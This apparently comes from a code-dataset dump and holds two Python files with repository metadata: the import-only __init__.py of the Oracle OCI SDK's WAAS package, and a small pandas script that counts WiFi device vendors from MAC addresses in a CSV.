"BSD-3-Clause"
] | null | null | null |
src/oci/waas/__init__.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/waas/__init__.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from .redirect_client import RedirectClient
from .redirect_client_composite_operations import RedirectClientCompositeOperations
from .waas_client import WaasClient
from .waas_client_composite_operations import WaasClientCompositeOperations
from . import models
__all__ = ["RedirectClient", "RedirectClientCompositeOperations", "WaasClient", "WaasClientCompositeOperations", "models"]
| 51.266667
| 245
| 0.819246
|
8cc87ba0bfc6f7f8f86e491bb96b9e67e7bf9db1
| 621
|
py
|
Python
|
app/distribution_check.py
|
AloneGu/wifi_analyse_demo
|
904bfcd5392735004edc15623985e5c04293aec4
|
[
"Apache-2.0"
] | null | null | null |
app/distribution_check.py
|
AloneGu/wifi_analyse_demo
|
904bfcd5392735004edc15623985e5c04293aec4
|
[
"Apache-2.0"
] | null | null | null |
app/distribution_check.py
|
AloneGu/wifi_analyse_demo
|
904bfcd5392735004edc15623985e5c04293aec4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import pandas as pd
from manuf import MacParser
VENDOR_DATA = './app/static/wifi_data/vendor_data'
WIFI_DATA = './app/static/wifi_data/t1.csv'
SS_THRES = -100
def get_wifi_data():
vendor_checker = MacParser(VENDOR_DATA)
df = pd.read_csv(WIFI_DATA, usecols=[0, 3, 6], header=None)
df.columns = ['timestamp', 'mac_address', 'signal_strength']
df = df[df.signal_strength > SS_THRES]
    df['vendor'] = df['mac_address'].map(vendor_checker.get_manuf)  # Series.map works on Python 3, where built-in map returns an iterator
s = df.groupby('vendor').size().sort_values(ascending=False)[:6] # get series
return list(s.index),list(s.values)
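# A minimal usage sketch (assumes the CSV and vendor database paths above exist):
#
#     if __name__ == '__main__':
#         vendors, counts = get_wifi_data()
#         for vendor, count in zip(vendors, counts):
#             print(vendor, count)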
| 34.5
| 82
| 0.695652
|